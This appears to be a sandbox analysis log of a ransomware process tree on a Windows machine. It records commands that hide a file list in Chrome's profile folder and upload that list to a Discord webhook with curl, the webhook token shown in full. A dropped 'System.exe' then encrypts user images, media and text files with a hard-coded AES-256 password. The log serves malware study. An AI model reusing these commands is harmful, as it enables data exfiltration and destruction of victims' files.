C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /s *.tmp4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"4⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "files:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "files:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```Files to be encrypted // from Admin - 10.127.0.105 @ 12:32:40.48 ```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\curl.execurl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "1:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "1:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\AppData\Roaming\StepGrant.jpg"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\AppData\Roaming\StepGrant.jpg" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\AppData\Roaming\StepGrant.jpg"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "2:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "2:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "3:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "3:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\Desktop\download.jpg"4⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\Desktop\download.jpg" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\Desktop\download.jpg"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "4:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "4:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\Desktop\OIP.jpg"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\Desktop\OIP.jpg" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\Desktop\OIP.jpg"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "5:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "5:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\Desktop\SubmitConnect.jpg"4⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\Desktop\SubmitConnect.jpg" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\Desktop\SubmitConnect.jpg"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "6:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "6:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\Music\JoinSend.jpg"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\Music\JoinSend.jpg" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\Music\JoinSend.jpg"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "7:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "7:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\Pictures\My Wallpaper.jpg"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\Pictures\My Wallpaper.jpg" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\Pictures\My Wallpaper.jpg"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "8:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "8:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\Desktop\WatchMeasure.mp3"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\Desktop\WatchMeasure.mp3" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\Desktop\WatchMeasure.mp3"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "9:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "9:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\Downloads\AssertOpen.mp3"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\Downloads\AssertOpen.mp3" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\Downloads\AssertOpen.mp3"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "10:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "10:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\Downloads\PublishStart.mp3"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\Downloads\PublishStart.mp3" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\Downloads\PublishStart.mp3"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "11:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "11:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\Music\PushConvertTo.mp4"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\Music\PushConvertTo.mp4" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\Music\PushConvertTo.mp4"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "12:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "12:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "13:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "13:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AutoPlayOptIn.gif"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AutoPlayOptIn.gif" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AutoPlayOptIn.gif"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "14:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "14:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ScreenshotOptIn.gif"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ScreenshotOptIn.gif" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ScreenshotOptIn.gif"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "15:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "15:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\Downloads\AddAssert.gif"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\Downloads\AddAssert.gif" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\Downloads\AddAssert.gif"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "16:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "16:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\Pictures\ConfirmMeasure.gif"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\Pictures\ConfirmMeasure.gif" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\Pictures\ConfirmMeasure.gif"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "17:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "17:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\Pictures\ImportCompare.gif"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\Pictures\ImportCompare.gif" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\Pictures\ImportCompare.gif"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "18:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "18:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "19:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "19:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\brndlog.txt"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\brndlog.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\brndlog.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "20:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "20:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ThirdPartyNotices.txt"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ThirdPartyNotices.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ThirdPartyNotices.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "21:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "21:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3699a22d-d766-475f-929d-0d1487d41226}\0.0.filtertrie.intermediate.txt"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3699a22d-d766-475f-929d-0d1487d41226}\0.0.filtertrie.intermediate.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3699a22d-d766-475f-929d-0d1487d41226}\0.0.filtertrie.intermediate.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "22:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "22:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3699a22d-d766-475f-929d-0d1487d41226}\0.1.filtertrie.intermediate.txt"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3699a22d-d766-475f-929d-0d1487d41226}\0.1.filtertrie.intermediate.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3699a22d-d766-475f-929d-0d1487d41226}\0.1.filtertrie.intermediate.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "23:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "23:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3699a22d-d766-475f-929d-0d1487d41226}\0.2.filtertrie.intermediate.txt"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3699a22d-d766-475f-929d-0d1487d41226}\0.2.filtertrie.intermediate.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3699a22d-d766-475f-929d-0d1487d41226}\0.2.filtertrie.intermediate.txt"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c findstr /b "24:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"4⤵
-
C:\Windows\system32\findstr.exefindstr /b "24:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"5⤵
-
C:\Windows\system32\attrib.exeAttrib +h +s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{77f0c28d-428a-4d18-9971-22926bfdcd25}\0.0.filtertrie.intermediate.txt"4⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exeSystem.exe --encrypt --file="C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{77f0c28d-428a-4d18-9971-22926bfdcd25}\0.0.filtertrie.intermediate.txt" --pass=7962089087181755926211401126974224811160328267 --algo=AES-2564⤵
- Executes dropped EXE
-
C:\Windows\system32\attrib.exeAttrib -h -s "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{77f0c28d-428a-4d18-9971-22926bfdcd25}\0.0.filtertrie.intermediate.txt"4⤵
-
